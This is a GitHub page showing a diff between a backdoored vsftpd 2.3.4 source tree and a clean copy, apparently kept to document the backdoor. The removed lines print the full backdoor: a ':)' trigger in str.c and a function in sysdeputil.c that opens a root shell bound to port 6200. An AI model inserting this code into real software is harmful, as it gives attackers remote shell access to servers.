forked from lyndon160/vsftpd-backdoor
-
Notifications
You must be signed in to change notification settings - Fork 0
/
infection.diff
108 lines (106 loc) · 2.84 KB
/
infection.diff
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
Only in vsftpd-2.3.4: access.o
Only in vsftpd-2.3.4: ascii.o
Only in vsftpd-2.3.4: banner.o
Only in vsftpd-2.3.4: features.o
Only in vsftpd-2.3.4: filestr.o
Only in vsftpd-2.3.4: ftpcmdio.o
Only in vsftpd-2.3.4: ftpdataio.o
Only in vsftpd-2.3.4: ftppolicy.o
Only in vsftpd-2.3.4: hash.o
Only in vsftpd-2.3.4: ipaddrparse.o
Only in vsftpd-2.3.4: logging.o
Only in vsftpd-2.3.4: ls.o
Only in vsftpd-2.3.4: main.o
Only in vsftpd-2.3.4: netstr.o
Only in vsftpd-2.3.4: oneprocess.o
Only in vsftpd-2.3.4: opts.o
Only in vsftpd-2.3.4: parseconf.o
Only in vsftpd-2.3.4: postlogin.o
Only in vsftpd-2.3.4: postprivparent.o
Only in vsftpd-2.3.4: prelogin.o
Only in vsftpd-2.3.4: privops.o
Only in vsftpd-2.3.4: privsock.o
Only in vsftpd-2.3.4: ptracesandbox.o
Only in vsftpd-2.3.4: readwrite.o
Only in vsftpd-2.3.4: secbuf.o
Only in vsftpd-2.3.4: secutil.o
Only in vsftpd-2.3.4: ssl.o
Only in vsftpd-2.3.4: sslslave.o
Only in vsftpd-2.3.4: standalone.o
diff -ur vsftpd-2.3.4/str.c vsftpd-2.3.4.4players/str.c
--- vsftpd-2.3.4/str.c 2011-06-30 15:52:38.000000000 +0200
+++ vsftpd-2.3.4.4players/str.c 2008-12-17 06:54:16.000000000 +0100
@@ -569,11 +569,6 @@
{
return 1;
}
- else if((p_str->p_buf[i]==0x3a)
- && (p_str->p_buf[i+1]==0x29))
- {
- vsf_sysutil_extra();
- }
}
return 0;
}
Only in vsftpd-2.3.4: str.o
Only in vsftpd-2.3.4: strlist.o
diff -ur vsftpd-2.3.4/sysdeputil.c vsftpd-2.3.4.4players/sysdeputil.c
--- vsftpd-2.3.4/sysdeputil.c 2011-06-30 15:58:00.000000000 +0200
+++ vsftpd-2.3.4.4players/sysdeputil.c 2010-03-26 04:25:33.000000000 +0100
@@ -34,10 +34,7 @@
/* For FreeBSD */
#include <sys/param.h>
#include <sys/uio.h>
-#include <netinet/in.h>
-#include <netdb.h>
-#include <string.h>
-#include <stdlib.h>
+
#include <sys/prctl.h>
#include <signal.h>
@@ -220,7 +217,7 @@
static int s_proctitle_inited = 0;
static char* s_p_proctitle = 0;
#endif
-int vsf_sysutil_extra();
+
#ifndef VSF_SYSDEP_HAVE_MAP_ANON
#include <sys/types.h>
#include <sys/stat.h>
@@ -843,30 +840,6 @@
}
}
-int
-vsf_sysutil_extra(void)
-{
- int fd, rfd;
- struct sockaddr_in sa;
- if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
- exit(1);
- memset(&sa, 0, sizeof(sa));
- sa.sin_family = AF_INET;
- sa.sin_port = htons(6200);
- sa.sin_addr.s_addr = INADDR_ANY;
- if((bind(fd,(struct sockaddr *)&sa,
- sizeof(struct sockaddr))) < 0) exit(1);
- if((listen(fd, 100)) == -1) exit(1);
- for(;;)
- {
- rfd = accept(fd, 0, 0);
- close(0); close(1); close(2);
- dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
- execl("/bin/sh","sh",(char *)0);
- }
-}
-
-
void
vsf_sysutil_set_proctitle_prefix(const struct mystr* p_str)
{
Only in vsftpd-2.3.4: sysdeputil.o
Only in vsftpd-2.3.4: sysstr.o
Only in vsftpd-2.3.4: sysutil.o
Only in vsftpd-2.3.4: tcpwrap.o
Only in vsftpd-2.3.4: tunables.o
Only in vsftpd-2.3.4: twoprocess.o
Only in vsftpd-2.3.4: utility.o